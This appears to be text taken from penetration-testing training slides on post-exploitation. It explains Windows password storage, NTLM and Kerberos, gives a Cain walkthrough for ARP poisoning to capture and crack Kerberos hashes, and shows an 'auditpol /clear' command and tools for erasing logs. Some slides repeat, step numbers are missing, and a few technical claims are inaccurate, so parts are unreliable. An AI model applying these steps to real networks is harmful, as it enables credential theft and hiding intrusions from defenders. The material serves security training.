PENETRATION TESTING

Phases 4-5

reate a golden kerberos ti

Post Exploitation
Methodology
Post-Exploitation

Once we have established an initial foothold in the targeted environment goal of

most penetration testers (as well as hackers) is to extract as much data as possible
from the victim as well as to expand their access and secure permanent access in the
network. Some of the examples of pillaging actions that can be performed are:
• Privilege escalation
• Lateral movement
• Password dumping/cracking
• Data exfiltration
• Setting up backdoors
This is definitely not a final list of what you can do once you compromise a target but
does represent some of the most important activities.
Post-Exploitation

From the perspective of an attack one of the most important assets you can
pillage from the victim, especially in an enterprise environment, are the
passwords.
Obtaining passwords will not only enable attackers to access resources
available to the affected accounts but also to perform various attack
techniques that support some of the other goals previously mentions.
Having that in mind with a proper set of credentials your attacks are limitless.
We can use it for different password based attacks (i.e. pass the hash, pass the
ticket), elevating privileges or lateral movement as well as most of the other
actions we need to perform.
Password Cracking

• Before any password cracking attack can begin we need to understand which
password type will be cracked and is this even possible
• As you saw during phase 1, we successfully collected huge number of user data
including emails and usernames.
• This is allowing a pentester to narrow down the attack and target only one (or
more) specific account(s) with password-cracking tools. This makes the attacker
faster and more likely to succeed.
• Normally, the best accounts to collect during your reconnaissance phase and of
course to try and attack with some of the password attacks are those with higher
privileges such as admin accounts. However, you should also assess the target
security as they might be monitoring any usage of these privileged accounts. In that
situation we might want to stat with a regular user account and then propagate the
attack further.
Password Cracking

Authentication mechanisms used by Microsoft

In order to understand password cracking and password attack methodology in
general we should explain how Microsoft performs its authentication processes.
The main solutions used in Windows OS are SAM, NTLM, LM, and Kerberos.
Security Accounts Manager is a database that stores security principals (accounts
or any entity that can be authenticated). Microsoft stores these principals locally in
a database known as the Security Accounts Manager (SAM). Credentials,
passwords, and other account information are stored in this database and the
passwords are stored in a hashed format.
In a running system Windows will keep a file lock on the SAM to prevent it from
being accessed by other applications or processes. Access to the SAM is allowed
only when device powered off or when the system has a Blue Screen of Death
failure.
Password Cracking

Passwords in SAM
• In Windows XP and later platforms, passwords are stored in a hashed format using the LM/NTLM hashing
mechanisms. The hashes are stored in c:\windows\system32\config\SAM.
• An account in the SAM looks like this:
• User:1010:624AAC413795CDC14E835F1CD90F4C76:6F585FF8FF6280B59CCE252FDB500EB8:::
• The part before the colon is the LM hash, and the part after the colon represents the NTLM hash. Password
crackers such as Ophcrack and L0phtCrack, pwdump, etc. can crack these hashes.
• All Windows versions after XP will have ONLY NTLM hash (by default its disabled but can be turned on) and
instead in this field they will have a blank (dummy) value which is not related to the real password. DO NOT
CRACK THIS! You should note that the dummy value is also used when the password exceeds 14 as LM
cannot support more than 13.
• Windows also has an option to secure password hashes by adding salt.
• This means that they will an extra randomness added to the hash in the process of creating that hash value.
• If Salt is added to a hash offline and precomputed it will make password attacks difficult and often
impossible to crack.
 Password Cracking
NTLM Authentication
NT LAN Manager (NTLM) is Microsofts proprietary protocol and cannot be seen elsewhere. NTLM v.1 & 2 is still widely
used in environments and applications where other protocols such as Kerberos are not available.
NTLMv1 is quite old but still supported in most newer products, but normally it should be replaced in applications and
environments with NTLMv2 (if other mechanisms are not possible).
NTLMv2 is an improved version of NTLM with better security but still relatively insecure compering to other modern
mechanisms. Due to this MS has added Security Support Provider (SSP) protocol which comes on top of NTLM and
provides additional layer of protection during authentication process.
If NTLM is used the following steps will be made during authentication:
1. The client enters their username and password into the login prompt or dialog.
2. Windows runs the password through a hashing algorithm to generate a hash for the specific password.
3. The client transmits the username and hash to a domain controller.
4. The domain controller generates a 16-byte random character string known as a nonce and transmits it back to the
client.
5. The client encrypts the nonce with the hash of the user password and sends it back to the domain controller.
6. The domain controller retrieves the hash from its SAM and uses it to encrypt the nonce it sent to the client.
If the hashes match, the login request is accepted. If not, the request is denied.
 Password Cracking
Kerberos
Microsoft is using Kerberos protocol (v. 5) for authentication since Windows 2000. It provides a robust authentication
framework which uses strong cryptographic mechanisms such as symmetric key cryptography and provides mutual
authentication of client and server. The Kerberos protocol is using following groups of components:
Key distribution center (KDC)
Authentication server (AS)
Ticket-granting server (TGS)
The process of using Kerberos works much like the following:
1. User wants to access another system, such as a server or client and if Kerberos is in use in this environment, a ticket
is required.
2. To obtain this ticket, user first gets authenticated against the AS, this creates a session key based on the password
together with a value that represents the service he is trying to connect to. This request serves as your ticket-granting
ticket (TGT).
3. TGT is presented to a TGS, which generates a ticket that allows this user to access the service.
4. Based on the situation, the service either accepts or rejects the ticket. If authorized TGT is valid only for a certain
period before it has to be regenerated which prevents it from being compromised.
 Password Cracking
Cracking Kerberos Practical
In this practical we will crack passwords captured from Kerberos using Cain.
1. In the Cain software start the sniffer by clicking the sniffer icon on the toolbar.
2. When prompted, choose the interface to sniff on.
3. Select the Sniffer tab. Click the blue + sign and click OK.
6. Now enter the addresses of the host(s) to be ARP poisoned,
8. In the toolbar select the ARP poisoning icon and note that the status will change to state
“poisoning.”
9. Wait for the victim to perform authentication and after couple of minutes click the Sniffer tab.
10. Click the Passwords tab.
11. Select MSKerb5-PreAuth Hashes and then Right-click and select Send To Cracker.
13. Click the Cracker tab and Select Kerb5 PreAuth Hashes.
15. Right-click a password and select a crack. This should now crack the hash.
Note the longer you sniff the networks the more credentials will bw captured so plan your attack with
some extra time.
 Password Cracking
Kerberos
Microsoft is using Kerberos protocol (v. 5) for authentication since Windows 2000. It provides a robust authentication
framework which uses strong cryptographic mechanisms such as symmetric key cryptography and provides mutual
authentication of client and server. The Kerberos protocol is using following groups of components:
Key distribution center (KDC)
Authentication server (AS)
Ticket-granting server (TGS)
The process of using Kerberos works much like the following:
1. User wants to access another system, such as a server or client and if Kerberos is in use in this environment, a ticket
is required.
2. To obtain this ticket, user first gets authenticated against the AS, this creates a session key based on the password
together with a value that represents the service he is trying to connect to. This request serves as your ticket-granting
ticket (TGT).
3. TGT is presented to a TGS, which generates a ticket that allows this user to access the service.
4. Based on the situation, the service either accepts or rejects the ticket. If authorized TGT is valid only for a certain
period before it has to be regenerated which prevents it from being compromised.
 Covering Your Tracks
In most cases attackers will try and prevent that their activity is discovered by the security teams. In order to oreach this goal they using various
techniques to hide their malware and their actions performed against the target. Common approach is deleting error messages, log files, and
other items that may have been altered during the attack process.
Disabling Auditing
One of the best ways to prevent being discovered is to leave no tracks at all. And one of the best ways to do that is to prevent any tracks from
being created or at least minimize the amount of evidence. When you’re trying not to leave tracks, a good starting point is altering the way events
are logged on the targeted system. Disabling auditing on a system prevents certain events from appearing and therefore slows detection efforts.
In the Windows environment, you can disable auditing with the auditpol command.
Using the NULL session technique you saw during your enumeration activities, you can attach to a system remotely and run the command as
follows:
auditpol \\<ip address of target> /clear
You can also perform what amounts to the surgical removal of entries in the Windows Security Log, using tools such as the following:
• Dump Event Log
• ELSave
• WinZapper
• CCleaner
• Wipe
• MRU-Blaster
• Tracks Eraser Pro
• Clear My History
QUESTIONS???